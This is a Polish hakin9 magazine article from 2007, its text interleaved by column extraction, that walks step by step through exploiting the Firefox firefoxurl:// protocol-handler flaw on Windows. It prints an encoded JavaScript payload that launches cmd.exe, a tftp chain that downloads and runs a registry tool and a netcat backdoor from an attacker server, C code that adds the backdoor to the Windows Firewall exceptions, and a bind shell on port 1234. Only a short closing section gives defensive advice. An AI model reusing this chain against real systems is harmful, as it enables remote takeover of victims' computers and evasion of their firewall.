Niebezpieczny Firefox
Atak
Konrad Zuwała
stopień trudności
Przeglądarka Mozilli zyskuje sobie coraz większą popularność.
Wielu użytkowników wybrało ją ze względu na bezpieczeństwo,
które oferuje, wydajny silnik Gecko czy kilka udoskonaleń, które
już na stałe zagościły w przeglądarkach. Czy jednak Firefox jest
tak bezpieczny, za jakiego jest uważany?
rzeglądarka Mozilli liczy sobie już ładnych liwiał uszkodzenie pamięci, co w połączeniu
parę lat. Swoją nazwę, Firefox, uzyskała z techniką przepełnienia bufora sprawiało, że
Pw lutym 2004. Zjednywała sobie coraz potencjalny intruz miał możliwość uruchomie-
większe rzesze użytkowników, by teraz stać się nia własnego kodu na komputerze ofiary. Tak-
de facto drugą  po Internet Explorerze  prze- że protokoły tworzone przez Firefoksa były przy-
glądarką na rynku. Jednak 10 lipca 2007 roku od- czyną wielu krytycznych luk związanych z bez-
kryta została luka, która umożliwia uruchomie- pieczeństwem. I właśnie jeden z nich powoduje
nie dowolnego programu w systemie Windows ostatnią lukę  firefoxurl://.
w kontekście Mozilli Firefox, z prawami użytkow-
nika aktualnie korzystającego z przeglądarki.
Krótko o Firefoksie,
Z artykułu dowiesz się
czyli przegląd błędów
" jak skompromitować system użytkownika
Mozilla Firefox  mimo, iż zyskała sobie po-
z przeglądarką Mozilla Firefox, działający
wszechną opinię niezwykle bezpiecznego na-
w środowisku Windows,
rzędzia nie ustrzegła się błędów, których konse-
" jak zabezpieczyć się przed tego typu atakiem.
kwencją były często poważne luki w zabezpie-
czeniach. Oczywiście nie ma w tym nic nadzwy-
Co powinieneś wiedzieć
czajnego, albowiem oprogramowanie ma to do
siebie, że tworzą je ludzie, a ci nie są nieomyl-
" znać podstawy JavaScriptu,
ni. Co ciekawe, nie wszystkie dziury zostały za-
" umieć pisać aplikacje sieciowe w środowisku
łatane (na stronie secunia.com 6 z 14 ma status
Windows,
Unpatched). Co psuło się w tej przeglądarce?
" znać podstawy WinAPI,
Nie radziła sobie ona z obsługą modelu DOM, " umieć administrować systemami Windows
z wykorzystaniem wiersza poleceń.
co było przyczyną błędu umożliwiającego omi-
nięcie zabezpieczeń i zmianę danych wyświe-
tlanych w przeglądarce. Silnik JavaScript umoż-
hakin9 Nr 12/2007
2 www.hakin9.org
Niebezpieczny Firefox
FirefoxURL włokę systemu Windows. Może też winniśmy dodać aplikację backdoora
Mozilla Firefox korzysta z silnika Gec- wykonać cały ciąg komend korzysta- do listy wyjątków zapory. Jeśli bardzo
ko. Silnik ten, oprócz przetwarzania jąc ze znaków && oznaczających wy- chcemy, możliwe jest nawet dodanie
stron internetowych, spełnia też in- konanie następnego polecenia, gdy naszej aplikacji do listy usług (servi-
ne istotne zadanie  zarządza inter- poprzednie zakończy się sukcesem. ces)  tak, aby uruchamiała się razem
fejsem użytkownika przeglądarki. Do Tak więc ciąg poleceń w rodzaju: uru- z systemem operacyjnym.
tego celu przeznaczony jest odrębny chom powłokę && pobierz Backdoor && Powstają przy tym dwa proble-
protokół Mozilli  firefoxurl://. Uchwyt omiń FirewallWindows && uruchom my: jak przemycić tak skomplikowa-
do tego protokołu jest rejestrowany Backdoor pozwoli intruzowi uzyskać ne zapytanie oraz w jaki sposób ścią-
w rejestrze systemu Windows, tak, zdalny dostęp do komputera ofiary, gnąć pliki na komputer użytkownika.
jak jest to pokazane na Listingu 1. omijając przy tym firewall systemu Ale po kolei.
Zatem, gdy wykonamy polecenie w Windows. Przykładowy backdoor mo- Nasze działania musimy rozpo-
rodzaju: firefoxurl://xxx, przeglądarka że otwierać powłokę (cmd.exe) na cząć od przygotowania kodu Java-
zostanie wywołana w wierszu poleceń: porcie wybranym przez intruza i ocze- Script, który pozwoli nam spreparo-
C:\Program Files\Mozilla\Firefox.exe kiwać na jego połączenie... wać odpowiednią stronę internetową,
-url  xxx -requestPending. Błąd ten zawierającą nasz exploit. Co powinna
występuje jedynie w Firefoksie w sys- Preparujemy zawierać taka strona? Otóż sam kod
temie Windows, a wersja przeglądar- odpowiednią stronę nie jest skomplikowany: jedyne co na-
ki, w której go odkryto, to 2.0.0.4. Dla- Pierwszym krokiem, jaki należy wy- leży zrobić, to wywołać z poziomu
czego tylko Windows? Otóż do wyko- konać, jest spreparowanie odpo- JavaScriptu firefoxurl w kontekście
nania złośliwego kodu konieczna jest wiedniej strony i namówienie ofiary, jakiegoś rozszerzenia Firefoksa  np.
obecność przeglądarki Internet Explo- aby weszła na nią używając przeglą- Chrome, na którym skupimy się w na-
rer, albowiem nie dokonuje ona spraw- darki Internet Explorer. Tak, Internet szym exploicie.
dzenia wpisywanego łańcucha pod Explorer, albowiem gdy napotka on Jak widać na Listingu 2. wywołu-
kątem obecności znaków specjalnych odniesienie firefoxurl://, wywoła Mo- jemy protokół Firefoksa, firefoxurl://,
(& itp.), przez co możliwe jest wysła- zillę Firefox w odpowiednim kontek- następnie inicjujemy proces potomny,
nie tak skonstruowanego żądania. Na ście, uruchamiając przy okazji pro- którego zadaniem jest wywołanie pro-
systemach uniksowych nie mamy In- gram cmd.exe na komputerze ofiary gramu cmd.exe. Kod JavaScript korzy-
ternet Explorera, nie mamy też moż- i jednocześnie pomijając sprawdze- sta z wewnętrznego interfejsu Mozil-
liwości wywołania protokołu Firefoksa nie żądania pod kątem występowa- li Firefox, z interfejsu procesów Mozil-
z jakiejkolwiek innej aplikacji, co sku- nia znaków specjalnych. Zastanówmy li (więcej na ten temat w ramce W Sie-
tecznie blokuje nam możliwość działa- się najpierw, jakie działania powin- ci). Co oznaczają te wszystkie cyfry
nia. Mozilla obecna na Linuksie nie bę- na podjąć nasza strona po uzyska- w kodzie poprzedzone znakiem %? Otóż
dzie więc obiektem naszego ataku. niu dostępu do powłoki. Z pewnością jest to Unicode  kodujemy znaki spe-
Opisywana luka pozwala na powinna w jakiś sposób przetransfe- cjalne w ten sposób, aby odróżniały
uruchomienie dowolnego programu rować przygotowany przez nas back- się nieco od kodu JavaScript (tam też
w kontekście np. Chrome, który jest door na dysk ofiary, następnie aplika- mamy cudzysłów, apostrof, itp., więc
odpowiedzialny za wygląd przeglą- cja ta powinna zostać uruchomiona. stosowanie tych znaków mogłoby do-
darki. Intruz może więc uruchomić No i nie zapominajmy o ominięciu fire- prowadzić do opacznej interpretacji
za pomocą specjalnie spreparowa- walla systemu Windows  blokuje on skryptu przez przeglądarkę. Dodat-
nej strony dowolny program na kom- domyślnie połączenia przychodzą- kowo zabezpiecza nas to przed kon-
puterze ofiary, np. cmd.exe, czyli po- ce na komputer ofiary, tak więc po- trolą wpisywanego tekstu, albowiem
Listing 1. Klucz protokołu Firefoxa w rejestrze Windows.
[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@]C:\PROGRA~1\MOZILL~2\FIREFOX.EXE -url  %13 -requestPending
Listing 2. Kod przykładowego exploita, wywołującego program cmd.exe na komputerze użytkownika
firefoxurl:test%22%20-chrome%20%
22javascript:C=Components.classes;I=Components.interfaces;file=C%5B%
27@mozilla.org/file/local;1%27%5D.createInstance%28I.nsILocalFile%29;file.initWithPath%28%
27C:%27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27Windows%
27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27System32%
27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27cmd.exe%27%
29;process=C%5B%27@mozilla.org/process/util;1%27%5D.createInstance%28I.nsIProcess%
29;process.init%28file%29;process.run%28true%252c%7B%7D%252c0%29;
www.hakin9.org hakin9 Nr 12/2007 3
Atak
w niektórych sytuacjach kod może zo- połączenia przychodzące (nie kontro- goś w rodzaju win32srv.exe, czegoś
stać rozpoznany jako złośliwy, co za- luje ona ruchu wychodzącego). Aby co wygląda na ważny plik systemo-
pobiegnie jego wykonaniu). Aby przy- program sieciowy mógł działać, mo- wy, postanowi w imię świętego spo-
gotować odpowiedni kod, należy naj- żemy go dodać do tzw. listy wyjątków koju zostawić ten program.
pierw dokładnie przemyśleć działanie  czyli zestawienia programów, któ- Co jednak zrobić w sytuacji, gdy
exploita. W pierwszej kolejności wi- re nie są przez zaporę kontrolowane użytkownik używa innej aplikacji niż
nien on uruchomić powłokę, następ- i mogą przyjmować dowolne połącze- wbudowany w jądro systemu Windows
nie za pomocą protokołu tftp pobrać nia na wybranych portach. W jaki jed- firewall? Przecież na rynku aż roi się od
aplikację backdoora i program mo- nak sposób sprawić, aby nasza apli- tego typu rozwiązań. Może to znaczą-
dyfikujący rejestr (dodanie do wyjąt- kacja znalazła się na liście wyjątków? co utrudnić nasz atak, ale tylko w czę-
ków firewalla Windows), po czym ko- Z pomocą przychodzi nam rejestr ści przypadków. Otóż niektóre zapory
nieczne jest uruchomienie obu apli- Windows, gdzie zapisane są wszyst- korzystają również z listy wyjątków fi-
kacji. Dlaczego wybór w kwestii prze- kie informacje o konfiguracji kompute- rewalla Windows, dopuszczając ruch
syłania plików padł na protokół tftp? ra, w tym również o zaporze. sieciowy dla programów, które dodane
Otóż jest on niezwykle prostym, ba- Lista wyjątków zapory jest w rze- są jako wyjątki tejże aplikacji. Oczywi-
zującym na UDP protokołem. Obsługa czywistości kluczem rejestru, ścieżka ście dotyczy to tylko pewnej grupy roz-
programu tftp.exe jest bardzo intuicyj- dostępu do autoryzowanych aplikacji wiązań, znaczna część programów
na, dzięki czemu maksymalnie skróci- jest pokazana na Listingu 4. filtrujących pakiety używa tylko i wy-
my długość naszego zapytania. Na Li- Po otwarciu tego klucza ujrzymy łącznie własnych baz danych, co blo-
stingu 3. widać finalną wersję wywoła- wszystkie programy, które znajdu- kuje możliwość ich prostego ominię-
nia cmd.exe. ją się w wyjątkach zapory. Naszym cia. Jednak z pomocą przychodzi nam
Jak widać z Listingu 3. musimy celem jest więc umieszczenie nowej znów WinAPI  można po prostu  pod-
być posiadaczami serwera tftp  wy- wartości, typu REG_SZ, której nazwa czepić się pod proces aplikacji, która
starczy ściągnąć darmowy tftp-se- będzie odpowiadała ścieżce dostępu ma możliwość korzystania z Internetu.
rver dla systemu Windows bądz
za- do backdoora (czyli C:\WINDOWS\ Autor nie będzie się na ten temat rozpi-
instalować odpowiednią aplikację do- system32\win32srv.exe), a wartość sywać, albowiem doskonale wyjaśnia
stępną dla Linuksa. Mamy zatem go- pokryje się z nazwą z jednym tyl- tę kwestię artykuł z hakin9 nr 3/2005,
towy plan działania, jednak najpierw ko wyjątkiem  znajdzie się tam sło- zatytułowany Omijanie firewalli osobi-
musimy przygotować odpowiednie wo enabled. To wszystko będzie za- stych w Windows. Nawet najlepszy fi-
programy  modifyReg.exe, dodający daniem aplikacji modifyReg.exe  za rewall nie może stanąć nam na prze-
backdoor do listy wyjątków zapory pomocą funkcji WinAPI zmieni ona re- szkodzie.
Windows oraz win32srv.exe  właści- jestr systemu. Posłuży nam do tego
wą aplikację odpowiadającą za nasz funkcja RegistryCreateKeyEx. Backdoor
dostęp do komputera ofiary. Żeby przekonać się o skuteczno- Ostatnim krokiem potrzebnym do po-
ści programu, można za pomocą pro- wodzenia operacji jest skonstruowa-
Omijamy firewall gramu regedit odnalez
ć odpowiedni nie aplikacji backdoora. Powinien on
Windows klucz lub po prostu wybrać menu Za- otwierać powłokę (cmd.exe) na wy-
Abyśmy mieli możliwość zdalnego pory z Panelu Sterowania i sprawdzić branym przez nas porcie i w razie na-
połączenia z komputerem, na którym listę wyjątków. Program win32srv.exe dejścia połączenia przekierowywać
zainstalujemy nasz backdoor, musi- jest poza kontrolą. Oczywiście, uważ- standardowe wejście, wyjście i stru-
my najpierw ominąć firewall  w prze- ny administrator dostrzeże nieznaną mień błędów do stworzonego gniaz-
ciwnym wypadku wszelkie przychodzą- aplikację na liście wyjątków, co w po- da  tak, abyśmy otrzymali coś w ro-
ce połączenia zostaną zablokowane. łączeniu z pewną wiedzą o zarządza- dzaju sesji telnetu. Tyle, że bez po-
Rozpocznijmy od zrozumienia obsługi nym systemie doprowadzi do usunię- trzeby znajomości hasła.
tegoż firewalla. Zapora systemu Win- cia naszego backdoora. Jednak więk- Można w tym miejscu pokusić się
dows standardowo blokuje wszystkie szość użytkowników po ujrzeniu cze- o napisanie samemu takiego progra-
Listing 3. Finalne wywołanie programu cmd.exe.
cmd.exe  cd c:\WINDOWS\system32\ && tftp -i GET ourTftpServer.com/modifyReg.exe && tftp
-i GET ourTftpServer.com/win32srv.exe && modifyReg.exe && win32srv.exe
Listing 4. Dostęp do autoryzowanych aplikacji zapory Windows poprzez rejestr.
HKEY_LOCAL_MACHINESYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\
AuthorizedApplications\List.
www.hakin9.org
4 hakin9 Nr 12/2007
Niebezpieczny Firefox
mu, jednak z pomocą przychodzi nam Przeanalizujmy Listing 6. urucha-  naszKod >, można też utworzyć np.
znany program netcat. Potrafi on na- miamy netcat na porcie 1234. Opcja przycisk, który po kliknięciu go wy-
słuchiwać połączenia przychodzące- -l mówi mu, że ma oczekiwać na po- woła nasz spreparowany skrypt. War-
go na zadanym porcie, by następnie łączenia, -e cmd.exe oznacza prze- to zwrócić uwagę na kodowanie cu-
przekierować wyjście, wejście oraz kierowanie cmd.exe na port 1234, dzysłowów przy wywołaniu cmd.exe.
strumień błędów dowolnego pro- a -L każe mu w razie przerwania sesji Używamy konstrukcji \ (czyli w Unico-
gramu (w naszym wypadku jest to oczekiwać na następne połączenia. de %5C%22). W zależności od wer-
cmd.exe). Dodatkowo zastosowanie Mamy gotową aplikację backdo- sji JavaScript (czyli od wersji prze-
netcata  jako sprawdzonego narzę- ora, program omijający firewall oraz glądarki) konstrukcja ta może zadzia-
dzia  pozwoli nam uniknąć wszel- koncepcję spreparowania strony. Na- łać lub nie  w niektórych przypad-
kich niespodziewanych problemów leży więc skleić to wszystko razem. kach znak \ jest niezbędny, nieraz zaś
implementacyjnych. Tak więc ściąga- może okazać się nadmiarowy. Należy
my netcata dla Windows NT, zmienia- A
ączymy elementy zatem sprawdzić obydwie możliwości.
my jego nazwę na win32srv.exe, a na- układanki W przypadku, gdy Unicode nas nie ra-
stępnie umieszczamy na naszym ser- Na początku utwórzmy finalną wer- tuje, można także posłużyć się Java-
werze ftp. Musimy nieco zmodyfiko- sję strony. Znaki specjalne (cudzysło- Scriptowym String.fromCharCode().
wać nasze finalne wywołanie  mia- wy, apostrofy, angielskie &) powinny być Po spreparowaniu strony musimy
nowicie programowi win32srv.exe po- zakodowane Unicode'm  tak, aby omi- oczywiście umieścić na naszym ser-
dać trzeba w wierszu poleceń pew- nąć zabezpieczenia związane z par- werze tftp odpowiednie pliki oraz za-
ne argumenty: przede wszystkim nu- sowaniem tego typu wyrażeń. rejestrować IP ofiary (można je spra-
mer portu, na którym ma nasłuchiwać Kod zawarty na Listingu 7. jest tym, wdzić np. w logach serwera Apache
oraz aplikację, którą winien do niego który umieszczamy na stronie. Moż- lub za pomocą prostego kodu PHP).
przekierować. na go wkleić do sekcji Listing 5. Kod programu modifyReg
#include
#include
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
LONG registryOperationStatus;
HKEY backdoorKeyHandle;
//Opis funkcji: http://msdn2.microsoft.com/en-us/library/ms724844.aspx
#define BACKDOOR_KEY "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\
StandardProfile\\AuthorizedApplications\\List"
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
BACKDOOR_KEY,
0,
NULL,
REG_OPTION_NON_VOLATILE,
KEY_WRITE,
NULL,
&backdoorKeyHandle,
NULL);
// if(registryOperationStaus!=ERROR_SUCCESS)
// exit(0);
RegSetValueEx(backdoorKeyHandle,
"C:\\WINDOWS\\system32\\win32srv.exe",
0,
REG_SZ,
"C:\\WINDOWS\\system32\\win32srv.exe:*:Enabled",
strlen("C:\\WINDOWS\\system32\\win32srv.exe:*:Enabled")
);
return 0;
}
Listing 6. Program netcat (win32srv.exe) wraz z odpowiednimi opcjami
cmd.exe  cd c:\WINDOWS\system32\ && tftp -i GET ourTftpServer.com/modifyReg.exe && tftp
-i GET ourTftpServer.com/win32srv.exe && modifyReg.exe && win32srv.exe -l -p1234 -d -e cmd.exe  L 
www.hakin9.org hakin9 Nr 12/2007 5
Atak
oraz połączeniu się z ofiarą na porcie
1234 powinniśmy ujrzeć znak zachę-
W Sieci
ty Windows: C:>.
" http://larholm.com/2007/07/10/internet-explorer-0day-exploit/  proof of concept
Analiza zdarzenia  jak exploita
" http://msdn2.microsoft.com/en-us/library/ms724844.aspx  opis funkcji RegCre-
się zabezpieczyć?
ateKeyEx
Nasz atak udał się z kilku powodów.
" http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/
Przede wszystkim furtką do naszego
en-us/tftp.mspx?mfr=true  opis polecenia tftp dla systemu Windows XP
komputera okazała się luka w prze-
" http://www.vulnwatch.org/netcat/  netcat dla Windows
glądarce. Jednak nawet mimo istnie-
nia tego błędu jesteśmy w stanie za-
bezpieczyć się przed podobnymi ata-
kami. I nie powiem w tym miejscu nic ną. Pozostaje mieć nadzieję, że wy- wać Windows lub po prostu lubi-
rewolucyjnego, albowiem metoda jest soka świadomość zagrożeń interne- my ten system, dobór przeglądar-
niezwykle prosta i chroni przed więk- towych uchroni Czytelnika przed tego ki wydaje się być w dobie wszech-
szością prób modyfikacji rejestru i pli- typu atakami. obecnego Internetu kwestią kluczo-
ków systemowych. Otóż wystarczy ko- wą. Czy warto rezygnować z Mozilli?
rzystać z konta użytkownika z ograni- Używać czy też nie, oto Moim skromnym zdaniem, zdecydo-
czeniami oraz systemu plików NTFS. jest pytanie wanie nie. Na uwagę zasługuje fakt,
W przypadku, gdy intruz uzyska na- Po zobaczeniu, jak prostym jest de że mimo, iż wykrywane są w niej lu-
sze uprawnienia podczas gdy korzy- facto przejęcie kontroli nad kompu- ki związane z bezpieczeństwem, są
stamy z konta administratora, może terem użytkownika Mozilli Firefox w one równie szybko naprawiane po-
on do woli modyfikować rejestr i pliki systemie Windows, nasuwa się py- przez opublikowanie kolejnej wersji
systemowe, dzięki czemu jest w stanie tanie, czy używanie Mozilli jest do- (opisywana podatność została usu-
ominąć zaporę Windows. Jednak gdy brym pomysłem? Przecież przeglą- nięta w wersji 2.0.0.5). Jesteśmy
nasze konto jest ograniczone, nie bę- darka ta nie jest tak bezpieczna, jak- więc narażeni na atak przez relatyw-
dzie mógł zainstalować oprogramowa- by się mogło wydawać przeciętne- nie krótki okres czasu. Poza tym, gdy
nia typu backdoor, albowiem zablokuje mu użytkownikowi komputera, któ- korzystamy z Internetu w pełni świa-
go firewall. Nie zmienia to faktu, iż po- ry wiedzę czerpie głównie od zna- domi zagrożeń, stosujemy się do re-
tencjalny intruz może wykonać szko- jomych lub z mało specjalistycznych guł bezpieczeństwa  wtedy nie ma-
dliwe operacje w kontekście naszego portali. Bardziej świadomy internau- my się czego obawiać. Cieszmy się
użytkownika, takie jak skasowanie pli- ta prędzej czy póz
niej postawi so- więc dobrem Internetu, surfując po
ków z katalogu domowego. Na to jest bie pytanie dotyczące bytu Firefok- jego stronach niczym innym, jak Mo-
tylko jedna rada  nie można wchodzić sa na jego komputerze. Oczywiście zillą Firefox.
na nieznane, podejrzane strony, które jeśli używamy systemu Linux, pro-
często są nam przysyłane przez ko- blem dla nas nie istnieje. Jednak kie- Podsumowanie
munikatory czy pocztę elektronicz- dy z jakichś powodów musimy uży- Opisywana podatność pozwala na
uruchomienie praktycznie dowolne-
go kodu na komputerze użytkowni-
Listing 7. Kod JavaScript, który należy umieścić w finalnej wersji strony
ka, co, jak zostało pokazane w arty-
firefoxurl:test%22%20-chrome%20%22javascript:C=Components.cla
kule, może mieć przykre konsekwen-
sses;I=Components.interfaces;file=C%5B%
cje. Pozostaje tylko mieć nadzieję,
27@mozilla.org/file/local;1%27%5D.createInstance%28I.nsILocalFile%29;file.init że Czytelnik będzie szerokim łukiem
WithPath%28%
omijał strony internetowe, które ktoś
27C:%27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27Windows%
nieznajomy podesłał mu drogą elek-
27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27System32%
troniczną. Kto wie, co czai się po dru-
27+String.fromCharCode%2892%29+String.fromCharCode%2892%29+%27cmd.exe%5C%22
giej stronie. l
cd
c:+String.fromCharCode%2892%29+String.fromCharCode%2892%
29WINDOWS+String.fromCharCode%2892%29+String.fromCharCode%2892%
29system32+String.fromCharCode%2892%29+String.fromCharCode%2892%29 %26%26
O autorze
tftp
Autor zajmuje się bezpieczeństwem
-i GET ourTftpServer.com/modifyReg.exe %26%26 tftp -i GET ourTftpServer.com/
aplikacji internetowych oraz szeroko
win32srv.exe %
rozumianą ochroną systemów kompu-
26%26 modifyReg.exe %26%26 win32srv.exe -l -p1234 -L -d -e cmd.exe%5C%22 27%
terowych. W wolnych chwilach progra-
29;process=C%5B%27@mozilla.org/process/util;1%27%5D.createInstance%28I.nsIP
muje (głównie C/C++, PHP) oraz za-
rocess%
rządza portalem internetowym. Kontakt
29;process.init%28file%29;process.run%28true%252c%7B%7D%252c0%29;
z autorem: kzuwala@poczta.onet.pl
www.hakin9.org
6 hakin9 Nr 12/2007